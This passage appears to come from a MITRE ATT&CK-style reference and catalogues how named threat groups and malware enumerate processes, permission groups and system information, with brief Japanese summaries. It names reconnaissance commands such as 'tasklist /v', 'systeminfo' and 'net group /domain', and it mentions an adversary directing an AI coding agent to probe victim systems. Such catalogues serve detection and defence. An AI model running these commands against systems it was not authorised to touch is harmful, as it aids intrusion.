installation. During RedPenguin, UNC3886 used malware capable of reading the PID for the Junos OS snmpd daemon. During the 2025 Poland Wiper Attacks, the adversaries enumerated current running processes using `tasklist`. Ke3chang performs process discovery using <code>tasklist</code> commands. APT1 gathered a list of running processes on the system using <code>tasklist /v</code>. An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions. Deep Panda uses the Microsoft Tasklist utility to list processes running on systems. Turla surveys a system upon check-in to discover running processes using the <code>tasklist /v</code> command. Turla RPC backdoors have also enumerated processes associated with specific open ports or named pipes. Darkhotel malware can collect a list of running processes on a system. Molerats actors obtained a list of active processes on the victim and sent them to C2 servers. APT3 has a tool that can list out currently running processes. Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times. After compromising a victim, Poseidon Group lists all running processes. Stealth Falcon malware gathers a list of running processes. Winnti Group looked for a specific process running on infected servers. FIN7 has used the PowerShell script 3CF9.ps1 to perform process discovery by executing `tasklist /v`. Additionally, WsTaskLoad.exe executes `tasklist /v` to perform process discovery. Gamaredon Group has used tools to enumerate processes on target hosts including Process Explorer. OilRig has run <code>tasklist</code> on a victim's machine and used infostealers to capture processes. Magic Hound malware can list running processes. APT37's Freenki malware lists running processes using the Microsoft Windows API. MuddyWater has used malware to obtain a list of running processes on the system. Tropic Trooper is capable of enumerating the running processes on the system using <code>pslist</code>. APT38 leveraged Sysmon to understand the processes, services in the organization. Kimsuky can gather a list of all processes running on a victim's machine. Kimsuky has also obtained running processes on the victim device utilizing PowerShell cmdlet `Get-Process`. Inception has used a reconnaissance module to identify active processes and other associated loaded modules. Rocke can detect a running process's PID on the infected machine. Windshift has used malware to enumerate active processes. Chimera has used <code>tasklist</code> to enumerate processes. Sidewinder has used tools to identify running processes on the victim's machine. HAFNIUM has used `tasklist` to enumerate processes. Higaisa’s shellcode attempted to find the process ID of the current process. Mustang Panda has used <code>tasklist /v</code> to determine active process information. Mustang Panda has also used TONESHELL malware to check the process name and process path to ensure it matches the expected one prior to triggering a custom exception handler. Andariel has used <code>tasklist</code> to enumerate processes and find a specific string. TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools. HEXANE has enumerated processes on targeted systems. Earth Lusca has used Tasklist to obtain information from a compromised host. Volt Typhoon has enumerated running processes on targeted systems including through the use of Tasklist. ToddyCat has run `cmd /c start /b tasklist` to enumerate processes. APT5 has used Windows-based utilities to carry out tasks including tasklist.exe. Play has used the information stealer Grixba to check for a list of security processes. UNC3886 has run scripts to list all running processes on a guest VM from an ESXi host. Medusa Group has utilized a hard-coded security tool process list that identifies and terminates using an undocumented IOCTL code 0x222094. Storm-0501 has discovered running processes through `tasklist.exe`. MirrorFace has used Tasklist on compromised hosts for discovery. Taidoor can use <code>GetCurrentProcessId</code> for process discovery. PlugX has a module to list the processes running on a machine. Ixeshe can list running processes. BISCUIT has a command to enumerate running processes and identify their owners. Sykipot may gather a list of running processes by running <code>tasklist /v</code>. Derusbi collects current and parent process IDs. Uroburos can use its `Process List` command to enumerate processes on compromised hosts. Carbanak lists running processes. BACKSPACE may collect information about running processes. gh0st RAT has the capability to list processes. NETEAGLE can send process listings over the C2 channel. The discovery modules used with Duqu can collect information on process details. JHUHUGIT obtains a list of running processes on the victim. ADVSTORESHELL can list running processes. GeminiDuke collects information on running processes and environment variables from the victim. Tasklist can be used to discover processes running on a system. WinMM sets a WH_CBT Windows hook to collect information on process creation. DustySky collects information about running processes from victims. SHOTPUT has a command to obtain a process listing. ELMER is capable of performing process listings. 4H RAT has the capability to obtain a listing of running processes (including loaded modules). BLACKCOFFEE has the capability to discover processes. MobileOrder has a command to upload information about all running processes to its C2 server. Elise enumerates processes via the <code>tasklist</code> command. Kasidet has the ability to search for a given process name in processes currently running in the system. BlackEnergy has gathered a process list by using Tasklist.exe. Epic uses the <code>tasklist /v</code> command to obtain a list of processes. Backdoor.Oldrea collects information about running processes. Trojan.Karagany can use Tasklist to collect a list of running tasks. Crimson contains a command to list processes. Remsec can obtain a process list from the victim. BBSRAT can list running processes. PowerDuke has a command to list the victim's processes. Winnti for Windows can check if the explorer.exe process is responsible for calling its install function. StreamEx has the ability to enumerate processes. ChChes collects its process identifier (PID) on the victim. RTM can obtain information about process integrity levels. MoonWind has a command to return a list of running processes. HALFBAKED can obtain information about running processes on the victim. Cobalt Strike's Beacon payload can collect information on process details. XAgentOSX contains the getProcessList function to run <code>ps aux</code> to get running processes. The OsInfo function in Komplex collects a running process list. Helminth has used Tasklist to get information on processes. Volgmer can gather a list of processes. FinFisher checks its parent process for indications that it is running in a sandbox setup. POWRUNER may collect process information by running <code>tasklist</code> on a victim. Pupy can list the running processes and get the process ID and parent process’s ID. PowerSploit's <code>Get-ProcessTokenPrivilege</code> Privesc-PowerUp module can enumerate privileges for a given process. NETWIRE can discover processes on compromised hosts. JPIN can list running processes. Hydraq creates a backdoor through which remote attackers can monitor processes. Pasam creates a backdoor through which remote attackers can retrieve lists of running processes. Linfo creates a backdoor through which remote attackers can retrieve a list of running processes. POORAIM can enumerate processes. WINERACK can enumerate processes. POWERSTATS has used <code>get_tasklist</code> to discover processes on the compromised host. Orz can gather a process list from the victim. Kwampirs collects a list of running services with the command <code>tasklist /v</code>. GravityRAT lists the running processes on the system. Proxysvc lists processes running on the system. Bankshot identifies processes and collects the process ids. ROKRAT can list the current running processes on the system. RATANKBA lists the system’s processes. SynAck enumerates all running processes. Comnie uses the <code>tasklist</code> to view running processes on the victim’s machine. NavRAT uses <code>tasklist /v</code> to check running processes. yty gets an output of running processes using the <code>tasklist</code> command. Gold Dragon checks the running processes on the victim’s machine. Zebrocy uses the <code>tasklist</code> and <code>wmic process get Capture, ExecutablePath</code> commands to gather the processes running on the system. Brave Prince lists the running processes. PLAINTEE performs the <code>tasklist</code> command to list running processes. Mosquito runs <code>tasklist</code> to obtain running processes. VERMIN can get a list of the processes and running tasks on the system. InvisiMole can obtain a list of running processes. Kazuar obtains a list of running processes through WMI querying and the <code>ps</code> command. TrickBot uses module networkDll for process list discovery. FELIXROOT collects a list of running processes. Bisonal can obtain a list of running processes on the victim’s machine. RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals. KEYMARBLE can obtain a list of running processes on the system. Socksbot can list all running processes. FruitFly has the ability to list processes on the system. iKitten lists the current processes running. jRAT can query and kill system processes. Zeus Panda checks for running processes on the victim’s machine. Agent Tesla can list the current running processes on the system. Remcos can discover running processes on compromised machines. UBoatRAT can list running processes on the system. DarkComet can list active processes running on the victim’s machine. Carbon can list the processes on the victim’s machine. Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot. Seasalt has a command to perform a process listing. OceanSalt can collect the name and ID for every process running on the system. Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance. Cannon can obtain a list of processes running on the system. Final1stspy obtains a list of running processes. KONNI has used the command <code>cmd /c tasklist</code> to get a snapshot of the current processes on the target machine. Empire can find information about processes running on local and remote systems. Emotet has been observed enumerating local processes. Astaroth searches for different processes on the system. njRAT can search a list of running processes for Tr.exe. Ursnif has gathered information about running processes. PowerStallion has been used to monitor process lists. EvilBunny has used EnumProcesses() to identify how many process are running in the environment. Machete has a component to check for running processes to look for web browsers. Fysbis can collect information about running processes. ZxShell has a command, ps, to obtain a listing of processes on the system. BabyShark has executed the <code>tasklist</code> command. PoetRAT has the ability to list all running processes. HotCroissant has the ability to list running processes on the infected host. Imminent Monitor has a "Process Watcher" feature to monitor processes in case the client ever crashes or gets closed. PLEAD has the ability to list processes on the compromised host. TSCookie has the ability to list processes on the infected host. PowerShower has the ability to deploy a reconnaissance module to retrieve a list of the active processes. ShimRatReporter listed all running processes on the machine. Ryuk has called <code>CreateToolhelp32Snapshot</code> to enumerate all running processes. Rising Sun can enumerate all running processes and process information on an infected machine. Maze has gathered all of the running system processes. LoudMiner used the <code>ps</code> command to monitor the running processes on the system. USBferry can use <code>tasklist</code> to gather information about the process running on the infected system. Metamorfo has performed process name checks and has monitored applications. Aria-body has the ability to enumerate loaded modules for a process.. Ramsay can gather a list of running processes by using Tasklist. Get2 has the ability to identify running processes on an infected host. SDBbot can enumerate a list of running processes on a compromised machine. SYSCON has the ability to use Tasklist to list running processes. TajMahal has the ability to identify running processes and associated plugins on an infected host. Skidmap has monitored critical processes to ensure resiliency. down_new has the ability to list running processes on a compromised host. Avenger has the ability to use Tasklist to identify running processes. Valak has the ability to enumerate running processes on a compromised host. Goopy has checked for the Google Updater process to ensure Goopy was loaded properly. Bundlore has used the <code>ps</code> command to list processes. Carberp has collected a list of running processes. Bonadan can use the <code>ps</code> command to discover other cryptocurrency miners active on the system. StrongPity can determine if a user is logged in by checking to see if explorer.exe is running. Dacls can collect data on running and parent processes. PipeMon can iterate over the running processes to find a suitable injection target. FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping. FatDuke can list running processes on the localhost. SoreFang can enumerate processes on a victim machine through use of Tasklist. Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later. Javali can monitor processes for open browsers and custom banking applications. Grandoreiro can identify installed security tools based on process names. Lucifer can identify the process that owns remote connections. SLOTHFULMEDIA has enumerated processes by ID, name, or privileges. Bazar can identity the current process on a compromised host. SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists. SUNSPOT monitored running processes for instances of <code>MsBuild.exe</code> by hashing the name of each running process and comparing it to the corresponding value <code>0x53D525</code>. It also extracted command-line arguments and individual arguments from the running <code>MsBuild.exe</code> process to identify the directory path of the Orion software Visual Studio solution. Dtrack’s dropper can list all running processes. Caterpillar WebShell can gather a list of processes running on the machine. Conti can enumerate through all open processes to search for any that have the string “sql” in their process name. Waterbear can identify the process for a specific security product. IronNetInjector can identify processes via C# methods such as <code>GetProcessesByName</code> and running Tasklist with the Python <code>os.popen</code> function. LookBack can list running processes. TAINTEDSCRIBE can execute <code>ProcessList</code> for process discovery. ThiefQuest obtains a list of running processes using the function <code>kill_unwanted</code>. ShadowPad has collected the PID of a malicious process. Kinsing has used ps to list processes. Doki has searched for the current process’s PID. EKANS looks for processes from a hard-coded list. Bad Rabbit can enumerate all running processes to compare hashes. KillDisk has called <code>GetCurrentProcess</code>. Clop can enumerate all processes on the victim's machine. SombRAT can use the <code>getprocesslist</code> command to enumerate processes on a compromised host. HELLOKITTY can search for specific processes to terminate. AppleSeed can enumerate the current process on a compromised host. Cuba can enumerate processes running on a victim's machine. P8RAT can check for specific processes associated with virtual environments. SodaMaster can search a list of running processes. RainyDay can enumerate processes on a target system. Nebulae can enumerate processes on a target system. Babuk has the ability to check running processes on a targeted system. Avaddon has collected information about running processes. ObliqueRAT can check for blocklisted process names on a compromised host. QakBot has the ability to check running processes. MarkiRAT can search for different processes on a system. BLUELIGHT can collect process filenames and SID authority level. Diavol has used `CreateToolhelp32Snapshot`, `Process32First`, and `Process32Next` API calls to enumerate the running processes in the system. Clambling can enumerate processes on a targeted system. FoggyWeb's loader can enumerate all Common Language Runtimes (CLRs) and running Application Domains in the compromised AD FS server's <code>Microsoft.IdentityServer.ServiceHost.exe</code> process. RCSession can identify processes based on PID. SysUpdate can collect information about running processes. Pandora can monitor processes on a compromised host. Gelsemium can enumerate running processes. WarzoneRAT can obtain a list of processes on a compromised host. Zox has the ability to list processes. CharmPower has the ability to list running processes through the use of `tasklist`. Lizar has a plugin designed to obtain a list of processes. Cyclops Blink can enumerate the process it is currently running under. Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`. SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded. CaddyWiper can obtain a list of current processes. DRATzarus can enumerate and examine running processes to determine if a debugger is present. Donut includes subprojects that enumerate and identify information about Process Injection candidates. Flagpro has been used to run the <code>tasklist</code> command on a compromised system. ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`. MacMa can enumerate running processes. OutSteel can identify running processes on a compromised host. Saint Bot has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`. Heyoka Backdoor can gather process information. Bumblebee can identify processes associated with analytical tools. FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`. macOS.OSAMiner has used `ps ax | grep <name> | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery. PcShare can obtain a list of running processes on a compromised host. AvosLocker has discovered system processes by calling `RmGetList`. metaMain can enumerate the processes that run on the platform. Mafalda can enumerate running processes on a machine. Brute Ratel C4 can enumerate all processes and locate specific process IDs (PIDs). SVCReady can collect a list of running processes from an infected host. Woody RAT can call `NtQuerySystemProcessInformation` with `SystemProcessInformation` to enumerate all running processes, including associated information such as PID, parent PID, image name, and owner. DarkTortilla can enumerate a list of running processes on a compromised system. Industroyer2 has the ability to cyclically enumerate running processes such as PServiceControl.exe, PService_PDD.exe, and other targets supplied through a hardcoded configuration. Royal can use `GetCurrentProcess` to enumerate processes. KOPILUWAK can enumerate current running processes on the targeted machine. RotaJakiro can monitor the `/proc/[PID]` directory of known RotaJakiro processes as a part of its persistence when executing with non-root permissions. If the process is found dead, it resurrects the process. RotaJakiro processes can be matched to an associated Advisory Lock, in the `/proc/locks` folder, to ensure it doesn't spawn more than one process. BADHATCH can retrieve a list of running processes from a compromised machine. Sardonic has the ability to execute the `tasklist` command. AsyncRAT can examine running processes to determine if a debugger is present. NightClub has the ability to use `GetWindowThreadProcessId` to identify the process behind a specified window. Ninja can enumerate processes on a targeted host. COATHANGER will query running process information to determine subsequent program execution flow. NKAbuse will check victim systems to ensure only one copy of the malware is running. DarkGate performs various checks for running processes, including security software by looking for hard-coded process name values. ZIPLINE can identify running processes and their names. Mispadu can enumerate the running processes on a compromised host. SocGholish can list processes on targeted hosts. Akira verifies the deletion of volume shadow copies by checking for the existence of the process ID related to the process created to delete these items. Raspberry Robin can identify processes running on the victim machine, such as security software, during execution. IPsec Helper can identify the process it is currently running under and its number, and pass this back to a command and control node. Apostle retrieves a list of all running processes on a victim host, and stops all services containing the string "sql," likely to propagate ransomware activity to database files. INC Ransomware can use the Microsoft Win32 Restart Manager to kill processes with a specific handle or that are accessing resources it wants to encrypt. LunarWeb has used shell commands to list running processes. MgBot includes a module for establishing a process watchdog for itself, identifying if the MgBot process is still running. Nightdoor can collect information on installed applications via Windows registry keys, as well as collecting information on running processes. CHIMNEYSWEEP can check if a process name contains “creensaver.” Cuckoo Stealer can use `ps aux` to enumerate running processes. DUSTTRAP can enumerate running processes. Latrodectus can enumerate running processes including process grandchildren on targeted hosts. UPSTYLE has the ability to read `/proc/self/cmdline` to see if it is running as a monitored process. ShrinkLocker checks whether the Bitlocker Drive Encryption Tools service is running. If sent the command `16002`, LightSpy uses the `NSWorkspace runningApplications()` method to collect the process ID, path to the executable, bundle information, and the filename of the executable for all running applications. Megazord can terminate a list of specified services and processes. LockBit 2.0 can determine if a running process has administrative privileges and terminate processes that interfere with encryption or exfiltration. LockBit 3.0 can identify and terminate specific services. Sagerunex identifies the `explorer.exe` process on the executing system. RansomHub can stop processes associated with files currently in use to maximize the impact of encryption. PUBLOAD has used `tasklist` to gather running processes on victim host. PUBLOAD has also leveraged the `OpenEventA` Windows API function to check whether the same process was already running. Havoc can enumerate processes on targeted hosts. HIUPAN has conducted process discovery to identify the PUBLOAD malware under the process WCBrowserWatcher.exe and will launch it from an install directory if it is not found. PAKLOG has detected and logged the full path of processes active in the foreground using Windows API calls. TONESHELL has checked the process name and process path to ensure it matches the expected one prior to triggering a custom exception handler. TONESHELL has also searched for running antivirus processes to include ESET’s antivirus associated executables ekrn.exe and egui.exe. Qilin can define specific processes to be terminated or left alone at execution. Medusa Ransomware has utilized an encoded list of the processes that it detects and terminates. InvisibleFerret has the capability to query installed programs and running processes. InvisibleFerret has also identified running processes using the Python project “psutil”. Embargo has utilized MS4Killer to detect running processes on the victim device. Embargo has also captured a snapshot of active running processes using the Windows API `CreateToolHelp32Snapshot()`. SystemBC has the ability to enumerate running processes. TRAILBLAZE has conducted process discovery by searching for specific named processes such as `/home/bin/web`. BRICKSTORM has the ability to check if it is running as an active child process through the detection of a specific environment variable. PureCrypter can enumerate processes on compromised hosts. LODEINFO can kill a process using specific process ID. HiddenFace can check running processes against a list of blocklisted applications. SPAWNCHIMERA has searched for running processes to include web or dsmdm. The AshTag AshenOrchestrator component has process management functionality. MuddyViper has the ability to collect running processes. LAMEHUG can gather process information on targeted systems. LP-Notes has searched for the process taskhostw.exe. 敵対者は、権限グループ（ローカル/ドメイン/クラウド）を探索することがある。 Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. 敵対者は、ローカルの権限グループを列挙して環境を把握することがある。Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. 敵対者は、ドメインの権限グループを列挙して環境を把握することがある。Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. 敵対者は、クラウドの権限グループ/ロールを列挙して環境を把握することがある。Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. 権限グループの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 used the `Get-ManagementRoleAssignment` PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell. APT3 has a tool that can enumerate the permissions associated with Windows groups. TA505 has used TinyMet to enumerate members of privileged groups. TA505 has also run <code>net group /domain</code>. APT41 used <code>net group</code> commands to enumerate various Windows user groups and permissions. Scattered Spider has enumerated the vSphere Admins and ESX Admins groups in targeted environments. FIN13 has enumerated all users and roles from a victim's main treasury system. Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for group and user discovery. MURKYTOP has the capability to retrieve information about groups. TrickBot can identify the groups the user on a compromised host belongs to. Carbon uses the <code>net group</code> command. ShimRatReporter gathered the local privileges for the infected host. IcedID has the ability to identify Workgroup membership. Siloscape checks for Kubernetes node permissions. 敵対者は、OS・ハードウェア等のシステム情報を探索することがある。 An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from Local Storage Discovery which is an adversary's discovery of local drive, disks and/or volumes. システム情報の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used Empire to obtain the compromised machine's name. During Operation Honeybee, the threat actors collected the computer name, OS, and other system information using `cmd /c systeminfo > %temp%\ temp.ini`. During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts. During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system. During Operation Wocao, threat actors discovered the OS versions of systems connected to a targeted network. During Cutting Edge, threat actors used the ENUM4LINUX Perl script for discovery on Windows and Samba hosts. KV Botnet Activity includes use of native system tools, such as <code>uname</code>, to obtain information about victim device architecture, as well as gathering other system information such as the victim's hosts file and CPU utilization. During Juicy Mix, OilRig used a script to send the name of the compromised host via HTTP `POST` to register it with C2. ArcaneDoor included collection of victim device configuration information. Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations. Leviathan performed host enumeration and data gathering operations on victim machines during Leviathan Australian Intrusions. During SharePoint ToolShell Exploitation, threat actors fingerprinted targeted SharePoint servers to identify OS version and running processes. During Operation AkaiRyū, MirrorFace collected system information. During the Anthropic AI-orchestrated Campaign, the adversary tasked Claude Code to query databases and systems in order to identify proprietary information, including system configurations and database types. Ke3chang performs operating system information discovery using <code>systeminfo</code> and has used implants to identify the system language and computer name. Turla surveys a system upon check-in to discover operating system configuration details using the <code>systeminfo</code> and <code>set</code> commands. Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine. admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: <code>ver >> %temp%\download</code> <code>systeminfo >> %temp%\download</code> APT3 has a tool that can obtain information about the local system. APT18 can collect system information from the victim’s machine. Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. Sandworm Team used a backdoor to enumerate information about the infected system's operating system. Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory. Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. FIN7 has used csvde.exe, which is a built-in Windows command line tool, to export system information. Additionally, WsTaskLoad has gathered system information, such as operating system and hostname. A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server. OilRig has run <code>hostname</code> and <code>systeminfo</code> on a victim. APT32 has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. APT32 executed shellcode to identify the name of the infected host. Sowbug obtained OS version and hardware configuration from a victim. Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server. FIN8 has used PowerShell Scripts to check the architecture of a compromised machine before the selection of a 32-bit or 64-bit version of a malicious .NET loader. APT37 collects the computer name, the BIOS model, and execution path. MuddyWater has used malware that can collect the victim’s OS version and machine name. APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine. Tropic Trooper has detected a target system’s OS version. APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs. Kimsuky has enumerated OS type, OS version, and other information using a script or the "systeminfo" command. Kimsuky has also obtained system information such as OS type, OS version, and system type through querying various Windows Management Instrumentation (WMI) classes including `Win32_OperatingSystem`. APT41 uses multiple built-in commands such as <code>systeminfo</code> and `net config Workstation` to enumerate victim system basic configuration information. Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host. Wizard Spider has used Systeminfo and similar commands to acquire detailed configuration information of a victim's machine. Wizard Spider has also utilized the PowerShell cmdlet `Get-ADComputer` to collect DNS hostnames, last logon dates, and operating system information from Active Directory. Rocke has used uname -m to collect the name and information about the infected system's kernel. Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information. Windshift has used malware to identify the computer name of a compromised host. Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host. Windigo has used a script to detect which Linux distribution and version is currently installed on the system. Higaisa collected the system GUID and computer name. ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2. Mustang Panda has gathered system information using <code>systeminfo</code>. TeamTNT has searched for system version, architecture, and hostname information. Aquatic Panda has used native OS commands to understand privilege levels and system details. HEXANE has collected the hostname of a compromised machine. SideCopy has identified the OS version of a compromised host. Moses Staff collected information about the infected host, including the machine names and OS architecture. CURIUM deploys information gathering tools focused on capturing IP configuration, running application, system information, and network connectivity information. Scattered Spider has executed scripts to identify the underlying operating system to ensure it uses the correct installation package for malicious payloads. FIN13 has collected local host information by utilizing Windows commands `systeminfo`, `fsutil`, and `fsinfo`. FIN13 has also utilized a compromised Symantex Altiris console and LanDesk account to retrieve host information. TA2541 has collected system information prior to downloading malware on the targeted host. Mustard Tempest has used implants to perform system reconnaissance on targeted systems. Malteiro collects the machine information, system architecture, the OS version, computer name, and Windows product name. Daggerfly utilizes victim machine operating system information to create custom User Agent strings for subsequent command and control communication. Winter Vivern script execution includes basic victim information gathering steps which are then transmitted to command and control servers. Moonstone Sleet has gathered information on victim systems. RedCurl has collected information about the target system, such as system information and list of network connections. Play has leveraged tools to enumerate system information. BlackByte used various system commands and tools to pull system information during operations. APT42 has used malware, such as GHAMBAR and POWERPOST, to collect system information. Medusa Group has leveraged `cmd.exe` to identify system info `cmd.exe /c systeminfo`. Contagious Interview has configured malicious webpages to identify the victim’s operating system by reviewing the details of the victims User-Agent of their browser. Storm-0501 has leveraged native Windows tools and commands such as `systeminfo` and open-source tools including OSQuery and ossec-win32 to query details about the endpoint. MirrorFace has employed malicious macros and native Windows tools such as csvde.exe, nltest.exe and quser.exe for discovery. VOID MANTICORE has gathered system information and disseminated it back to C2. PlugX has collected system information including OS version, processor information, RAM size, location, host name, IP, and screen size of the infected host. Ixeshe collects the computer name of the victim's system during the initial infection. BISCUIT has a command to collect the processor type, operation system, computer name, and whether the system is a laptop or PC. Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system. Uroburos has the ability to gather basic system information and run the POSIX API `gethostbyname`. Dyre has the ability to identify the computer name, OS version, and hardware configuration on a compromised host. During its initial execution, BACKSPACE extracts operating system information from the infected host. gh0st RAT has gathered system architecture, processor, OS configuration, and installed hardware information. BUBBLEWRAP collects system information, including the operating system version and hostname. ADVSTORESHELL can run Systeminfo to gather information about the victim. A system info module in CozyCar gathers information on the victim host’s configuration. PinchDuke gathers system configuration information. MiniDuke can gather the hostname on a compromised machine. SslMM sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date. WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server. Sys10 collects the computer name, OS versioning information, and OS install date and sends the information to the C2. DustySky extracts basic information about the operating system. 4H RAT sends an OS version identifier in its beacons. MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information. Elise executes <code>systeminfo</code> after initial communication is made to the remote server. Emissary has the capability to execute ver and systeminfo commands. The initial beacon packet for Misdat contains the operating system version of the victim. The initial beacon packet for Mis-Type contains the operating system version and file system of the victim. The initial beacon packet for S-Type contains the operating system version and file system of the victim. ZLib has the ability to enumerate system information. Kasidet has the ability to obtain a victim's system name and operating system version. BlackEnergy has used Systeminfo to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor. Epic collects the OS version, hardware information, computer name, available system memory status, and system and user language settings. Backdoor.Oldrea collects information about the OS and computer name. Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration. Systeminfo can be used to gather information about the operating system. T9000 gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation. dsquery has the ability to enumerate various information, such as the operating system and host name, for systems within a domain. cmd can be used to find information about the operating system. A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory. Crimson contains a command to collect the victim PC name and operating system. Pisloader has a command to collect victim system information, including the system name and OS version. Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition. Unknown Logger can obtain information about the victim computer name, physical memory, country, and date. CORESHELL collects hostname and OS version data from the victim and sends the information to its C2 server. PowerDuke has commands to get information about the victim's name, build, version, serial number, and memory usage. Shamoon obtains the victim's operating system version and keyboard layout and sends the information to the C2 server. Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP. StreamEx has the ability to enumerate system information. ChChes collects the victim hostname, window resolution, and Microsoft Windows version. RTM can obtain the computer name, OS version, and default language identifier. MoonWind can obtain the victim hostname, Windows version, RAM amount, and screen resolution. HALFBAKED can obtain information about the OS, processor, and BIOS. RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information. WINDSHIELD can gather the victim computer name. KOMPROGO is capable of retrieving information about the infected system. SOUNDBITE is capable of gathering system information. XAgentOSX contains the getInstalledAPP function to run <code>ls -la /Applications</code> to gather what applications are installed. OSInfo discovers information about the infected machine. Felismus collects the system information, including hostname and OS version, and sends it to the C2 server. Reaver collects system information from the victim, including CPU speed, computer name, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information. Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit. Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine. FALLCHILL can collect operating system (OS) version information, processor information, and system name from the victim. FinFisher checks if the victim OS is 32 or 64-bit. POWRUNER may collect information about the system by running <code>hostname</code> and <code>systeminfo</code> on a victim. DownPaper collects the victim host name and serial number, and then sends the information to the C2 server. Pupy can grab a system’s information including the OS version, architecture, etc. PUNCHBUGGY can gather system information such as computer names. NETWIRE can discover and collect victim system information. TURNEDUP is capable of gathering system information. JPIN can obtain system information such as OS version and disk space. Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed. Naid collects a unique identifier (UID) from a compromised host. Pasam creates a backdoor through which remote attackers can retrieve information like hostname. Linfo creates a backdoor through which remote attackers can retrieve system information. can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path. KARAE can collect system information. POORAIM can identify system information, including battery status. SHUTTERSPEED can collect system information. SLOWDRIFT collects and sends system information to its C2. WINERACK can gather information about the host. POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts. NanHaiShu can gather the victim computer name and serial number. Orz can gather the victim OS version and whether it is 64 or 32 bit. ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server. MURKYTOP has the capability to retrieve information about the OS. Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands <code>systeminfo</code>, <code>net config workstation</code>, <code>hostname</code>, <code>ver</code>, <code>set</code>, and <code>date /t</code>. GravityRAT collects the MAC address, computer name, and CPU information. Proxysvc collects the OS version, country name, MAC address, computer name, and physical memory statistics. Bankshot gathers system information, network addresses, and the operation system version. ROKRAT can gather the hostname and the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems. RATANKBA gathers information about the OS architecture, OS name, and 